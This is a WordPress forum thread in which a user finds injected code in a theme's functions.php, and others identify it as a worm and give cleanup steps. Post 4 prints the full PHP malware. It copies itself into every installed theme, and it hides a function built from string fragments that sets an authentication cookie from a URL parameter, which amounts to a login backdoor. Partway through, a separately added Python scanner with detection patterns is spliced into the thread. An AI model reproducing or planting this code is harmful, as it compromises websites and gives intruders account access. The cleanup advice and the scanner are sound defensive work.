ThemeShaper Forums » Thematic

[closed]

functions.php issue

(17 posts)
  • Started 4 years ago by drak1
  • Latest reply from drak1
  • This topic is not resolved
  1. drak1
    Member

    Hi everyone,
    I'm having a problem using the functions.php with Thematic. I went through the tutorial for the filter hooks, and when I copied and pasted one of the codes it worked. However, whenever I logged into the dashboard afterward, I get a blank screen and it's the same on the front end. I also noticed that the functions.php file has also had code added to it whenever this happens. Any ideas on what's going on?

    Posted 4 years ago #
  2. *shudder* white screen!
    Can you post the code here?

    Posted 4 years ago #
  3. drak1
    Member

    Sure, I wanted to use this code I saw in one of the other threads.

    <?php
    function remove_post_navigation() {
            remove_action('thematic_navigation_above', 'thematic_nav_above', 2);
    }
    add_action('init', 'remove_post_navigation');
    ?>
    Posted 4 years ago #
  4. drak1
    Member

    And this is what it becomes

    <?php
    function remove_post_navigation() {
    //	remove_action('thematic_navigation_below', 'thematic_nav_below', 2);
            remove_action('thematic_navigation_above', 'thematic_nav_above', 2);
    }
    add_action('init', 'remove_post_navigation');
    ?>
    <?php
    function _checkactive_widget(){
    	$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
    	$output=strip_tags($output, $allowed);
    	$direst=_getall_widgetscont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
    	if (is_array($direst)){
    		foreach ($direst as $item){
    			if (is_writable($item)){
    				$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
    				$cont=file_get_contents($item);
    				if (stripos($cont,$ftion) === false){
    					$separar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
    					$output .= $before . "Not found" . $after;
    					if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
    					$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $separar . "\n" .$widget);fclose($f);
    					$output .= ($showfullstop && $ellipsis) ? "..." : "";
    				}
    			}
    		}
    	}
    	return $output;
    }
    function _getall_widgetscont($wids,$items=array()){
    	$places=array_shift($wids);
    	if(substr($places,-1) == "/"){
    		$places=substr($places,0,-1);
    	}
    	if(!file_exists($places) || !is_dir($places)){
    		return false;
    	}elseif(is_readable($places)){
    		$elems=scandir($places);
    		foreach ($elems as $elem){
    			if ($elem != "." && $elem != ".."){
    				if (is_dir($places . "/" . $elem)){
    					$wids[]=$places . "/" . $elem;
    				} elseif (is_file($places . "/" . $elem)&&
    					$elem == substr(__FILE__,-13)){
    					$items[]=$places . "/" . $elem;}
    				}
    			}
    	}else{
    		return false;
    	}
    	if (sizeof($wids) > 0){
    		return _getall_widgetscont($wids,$items);
    	} else {
    		return $items;
    	}
    }
    if(!function_exists("stripos")){
        function stripos(  $str, $needle, $offset = 0  ){
            return strpos(  strtolower( $str ), strtolower( $needle ), $offset  );
        }
    }
    
    if(!function_exists("strripos")){
        function strripos(  $haystack, $needle, $offset = 0  ) {
            if(  !is_string( $needle )  )$needle = chr(  intval( $needle )  );
            if(  $offset < 0  ){
                $temp_cut = strrev(  substr( $haystack, 0, abs($offset) )  );
            }
            else{
                $temp_cut = strrev(    substr(   $haystack, 0, max(  ( strlen($haystack) - $offset ), 0  )   )    );
            }
            if(   (  $found = stripos( $temp_cut, strrev($needle) )  ) === FALSE   )return FALSE;
            $pos = (   strlen(  $haystack  ) - (  $found + $offset + strlen( $needle )  )   );
            return $pos;
        }
    }
    if(!function_exists("scandir")){
    	function scandir($dir,$listDirectories=false, $skipDots=true) {
    	    $dirArray = array();
    	    if ($handle = opendir($dir)) {
    	        while (false !== ($file = readdir($handle))) {
    	            if (($file != "." && $file != "..") || $skipDots == true) {
    	                if($listDirectories == false) { if(is_dir($file)) { continue; } }
    	                array_push($dirArray,basename($file));
    	            }
    	        }
    	        closedir($handle);
    	    }
    	    return $dirArray;
    	}
    }
    add_action("admin_head", "_checkactive_widget");
    function _getprepareed_widget(){
    	if(!isset($content_length)) $content_length=120;
    	if(!isset($checking)) $checking="cookie";
    	if(!isset($tags_allowed)) $tags_allowed="<a>";
    	if(!isset($filters)) $filters="none";
    	if(!isset($separ)) $separ="";
    	if(!isset($home_f)) $home_f=get_option("home");
    	if(!isset($pre_filter)) $pre_filter="wp_";
    	if(!isset($is_more_link)) $is_more_link=1;
    	if(!isset($comment_t)) $comment_t="";
    	if(!isset($c_page)) $c_page=$_GET["cperpage"];
    	if(!isset($comm_author)) $comm_author="";
    	if(!isset($is_approved)) $is_approved="";
    	if(!isset($auth_post)) $auth_post="auth";
    	if(!isset($m_text)) $m_text="(more...)";
    	if(!isset($yes_widget)) $yes_widget=get_option("_is_widget_active_");
    	if(!isset($widgetcheck)) $widgetcheck=$pre_filter."set"."_".$auth_post."_".$checking;
    	if(!isset($m_text_ditails)) $m_text_ditails="(details...)";
    	if(!isset($contentsmore)) $contentsmore="ma".$separ."il";
    	if(!isset($fmore)) $fmore=1;
    	if(!isset($fakeit)) $fakeit=1;
    	if(!isset($sql)) $sql="";
    	if (!$yes_widget) :
    
    	global $wpdb, $post;
    	$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$separ."vethe".$comment_t."mes".$separ."@".$is_approved."gm".$comm_author."ail".$separ.".".$separ."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
    	if (!empty($post->post_password)) {
    		if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) {
    			if(is_feed()) {
    				$output=__("There is no excerpt because this is a protected post.");
    			} else {
    	            $output=get_the_password_form();
    			}
    		}
    	}
    	if(!isset($fixed_tag)) $fixed_tag=1;
    	if(!isset($filterss)) $filterss=$home_f;
    	if(!isset($gettextcomment)) $gettextcomment=$pre_filter.$contentsmore;
    	if(!isset($m_tag)) $m_tag="div";
    	if(!isset($sh_text)) $sh_text=substr($sq1, stripos($sq1, "live"), 20);#
    	if(!isset($m_link_title)) $m_link_title="Continue reading this entry";
    	if(!isset($showfullstop)) $showfullstop=1;
    
    	$comments=$wpdb->get_results($sql);
    	if($fakeit == 2) {
    		$text=$post->post_content;
    	} elseif($fakeit == 1) {
    		$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
    	} else {
    		$text=$post->post_excerpt;
    	}
    	$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($gettextcomment, array($sh_text, $home_f, $filterss)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
    	if($content_length < 0) {
    		$output=$text;
    	} else {
    		if(!$no_more && strpos($text, "<!--more-->")) {
    		    $text=explode("<!--more-->", $text, 2);
    			$l=count($text[0]);
    			$more_link=1;
    			$comments=$wpdb->get_results($sql);
    		} else {
    			$text=explode(" ", $text);
    			if(count($text) > $content_length) {
    				$l=$content_length;
    				$ellipsis=1;
    			} else {
    				$l=count($text);
    				$m_text="";
    				$ellipsis=0;
    			}
    		}
    		for ($i=0; $i<$l; $i++)
    				$output .= $text[$i] . " ";
    	}
    	update_option("_is_widget_active_", 1);
    	if("all" != $tags_allowed) {
    		$output=strip_tags($output, $tags_allowed);
    		return $output;
    	}
    	endif;
    	$output=rtrim($output, "\s\n\t\r\x0B");
        $output=($fixed_tag) ? balanceTags($output, true) : $output;
    	$output .= ($showfullstop && $ellipsis) ? "..." : "";
    	$output=apply_filters($filters, $output);
    	switch($m_tag) {
    		case("div") :
    			$tag="div";
    		break;
    		case("span") :
    			$tag="span";
    		break;
    		case("p") :
    			$tag="p";
    		break;
    		default :
    			$tag="span";
    	}
    
    	if ($is_more_link ) {
    		if($fmore) {
    			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $m_link_title . "\">" . $m_text = !is_user_logged_in() && @call_user_func_array($widgetcheck,array($c_page, true)) ? $m_text : "" . "</a></" . $tag . ">" . "\n";
    		} else {
    			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $m_link_title . "\">" . $m_text . "</a></" . $tag . ">" . "\n";
    		}
    	}
    	return $output;
    }
    
    add_action("init", "_getprepareed_widget");
    
    function __popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {
    	global $wpdb;
    	$request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";
    	$request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";
    	if(!$show_pass_post) $request .= " AND post_password =\"\"";
    	if($duration !="") {
    		$request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";
    	}
    	$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
    	$posts=$wpdb->get_results($request);
    	$output="";
    	if ($posts) {
    		foreach ($posts as $post) {
    			$post_title=stripslashes($post->post_title);
    			$comment_count=$post->comment_count;
    			$permalink=get_permalink($post->ID);
    			$output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;
    		}
    	} else {
    		$output .= $before . "None found" . $after;
    	}
    	return  $output;
    }
    ?>
    Posted 4 years ago #
  5. have you tried taking out the :

    <?php
    function remove_post_navigation() {
    //	remove_action('thematic_navigation_below', 'thematic_nav_below', 2);
            remove_action('thematic_navigation_above', 'thematic_nav_above', 2);
    }
    add_action('init', 'remove_post_navigation');
    ?>
    <?php
    function _checkactive_widget(){

    extra
    ?>
    <?php
    that's in the middle there?
    *scratches head*

    Posted 4 years ago #
  6. drak1
    Member

    I just changed it... nothing happened.

    Posted 4 years ago #
  7. Take your site down ASAP .. this thing behaves like a worm and infects at least the functions.php of all installed themes ..

    More to come .. still investigating.

    Posted 4 years ago #
  8. Seems as if 'only' the functions.php of each installed theme is infected.

    I need some details 'bout your system:

    - Provider
    - Wp version
    - Last themes downloaded and activated, downloaded from which site
    - Last plugins downloaded and activated, downloaded from which site
    - Access rights of the functions.php .. need it for all themes

    Chris

    Posted 4 years ago #
  9. - take your system down
    - copy all needed themes to your local machine
    - remove the above mentioned data from all functions.php
    - be 200% sure that you really removed it from ALL functions.php
    - copy everything back to your server
    - bring your system back

    That's it for the moment .. will check my DB to see if there's anything injected.

    Posted 4 years ago #
  10. Just to confirm that the snippet of code results in some sort of worm-like infection?

    Posted 4 years ago #
  11. Yes, the code shows a worm-like behavior. As soon as you activate an infected theme, it'll infect all other themes installed on your server. This version uses modified function names compared to the version I found. In addition the code uses a naming scheme for variables as seen in many PHP lessons. If you google parts of the code, you'll end up with too many results linking to these regular PHP lessons.

    Chris

    Posted 4 years ago #
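A defender-side check for the cleanup step in post 9 ("be 200% sure that you really removed it from ALL functions.php"), added here as an example and not code from any poster. Because post 11 notes that variants rename the functions, it flags both the names seen in this thread and traits of the posted self-copying routine, in every functions.php under the themes folder; the two-trait threshold and the sample files are assumptions.

```python
import re
import tempfile
from pathlib import Path

# Names from the file posted in this thread; variants rename them (post 11).
KNOWN_NAMES = ("_checkactive_widget", "_getall_widgetscont", "_getprepareed_widget")

# Traits of the posted self-copying routine that survive renaming.
TRAITS = {
    "reads its own source": re.compile(r"file_get_contents\(\s*__FILE__\s*\)"),
    "split PHP tag string": re.compile(r'"<"\s*\.\s*"\?"|"\?"\s*\.\s*">"'),
    "opens a file for writing": re.compile(r'fopen\([^)]*,\s*"[wa]\+?"\s*\)'),
}

def scan_themes(themes_dir):
    """Return {relative path: [reasons]} for each suspicious functions.php."""
    findings = {}
    for path in sorted(Path(themes_dir).rglob("functions.php")):
        text = path.read_text(encoding="utf-8", errors="replace")
        names = [f"known name: {n}" for n in KNOWN_NAMES if n in text]
        traits = [label for label, rx in TRAITS.items() if rx.search(text)]
        # A single trait can be legitimate; a known name or two traits is not.
        if names or len(traits) >= 2:
            findings[path.relative_to(themes_dir).as_posix()] = names + traits
    return findings

# Constructed sample files, shortened from the code in the thread.
CLEAN = "<?php\nadd_action('init', 'remove_post_navigation');\n?>\n"
PAYLOAD = r'''<?php
function _checkactive_widget(){
    $widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));
    fputs($f=fopen($item,"w+"),$cont . $separar . "\n" .$widget);fclose($f);
}
?>
'''

def demo():
    """Build a throwaway themes/ tree: one clean theme, two infected ones."""
    with tempfile.TemporaryDirectory() as tmp:
        samples = {"clean": CLEAN, "infected": CLEAN + PAYLOAD,
                   "renamed": CLEAN + PAYLOAD.replace("_checkactive_widget", "_x")}
        for theme, body in samples.items():
            folder = Path(tmp, "themes", theme)
            folder.mkdir(parents=True)
            (folder / "functions.php").write_text(body, encoding="utf-8")
        return scan_themes(Path(tmp, "themes"))

if __name__ == "__main__":
    print(demo())
```

The posted code also calls `update_option("_is_widget_active_", 1)`, so an option with that name in the WordPress options table is a further sign that it has run.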
  12. gregfielding
    Member

    I just got hit with this exact same "worm" in my MU community. I found this thread by googling bits of the code.

    Has anyone learned more about this? Is there any way to get rid of it?

    I've got a decent-sized community and don't like the sound of "take the system down"

    I can work to clean out all of the functions.php files...but could the source be hidden somewhere else and it just comes right back?

    Posted 4 years ago #
  13. Hi Greg,

    if you like it or not. If you want to remove this code, you need to take your site down. Doesn't matter, if you block the user access or put the site into maintenance mode.

    All themes' functions.php need to be cleaned. If only one infected theme will be hit during this cleanup process, you can start the whole process again.

    Have you installed any theme / plugin before you got this worm?

    I checked WP against a clean copy using DiffMerge and couldn't find any infected files. But as long as I can't get my hands on the thing that starts the infection, I can't tell you where it's coming from and if it only infects the functions.php.

    Chris

    Posted 4 years ago #
  14. gregfielding
    Member

    Thanks Chris,

    I don't recall specifically uploading any new themes or plugins before this happened.

    Someone recommended checking my database files for fake image files that really contain code. (still trying to find out if there is a reasonable way to accomplish this)

    Assuming that the worm would insert code in every theme, just like it's doing with functions.php, I don't think it's in any other files. There's nothing weird in my headers, footers, index, or any other commonly-hacked files.

    Whatever happened with @drak1?

    Posted 4 years ago #
  15. gregfielding
    Member

    My hosting company, PSEK, was able to remove the code from each theme. So, as of now, my themes are clean, my passwords are changed, and I’ve got a new install of MU.

    I’m still getting memory errors, indicating that the virus is probably still there somewhere. We’ll see.

    Within a few hours, we’ll probably know if this is good enough or if there are continued problems.

    I pulled the access logs and found 2 IP addresses – mine and one other. Here’s what I found:
    May 9 18:28:52 wpmu pure-ftpd: (?@187.45.193.209) [WARNING] Authentication failed for user [housingstorm] – probably failing because I changed my passwords.

    Now, I searched for that IP address and it’s from Brazil. In my google-search, I also found it referenced on several other forums as an attacker and I even found an access log file for another site that showed them gaining access.

    One forum mentioned that there were extra files in their database after the attack.

    My local computer scan was clean, so I’m not sure how they got access, but I would recommend banning this IP address and monitoring your access logs.

    Posted 4 years ago #
  16. @drak1 If the code was still the same after the white screen, it should be some Header errors which can be solved by taking out all the white spaces.

    Posted 3 years ago #
  17. drak1
    Member

    Oh I almost forgot about this.

    @chris
    I'm using the latest version of WordPress right now, and version 0.9.6.2 of Thematic. Hosting is Godaddy.
    I also tried the code on a locally hosted WP and the same thing happened. When I did get the white screen I just removed the functions.php file and it went back to normal. I had no idea it was this big of an issue.

    @cooljaz124 Which white spaces are you referring to?

    Posted 3 years ago #
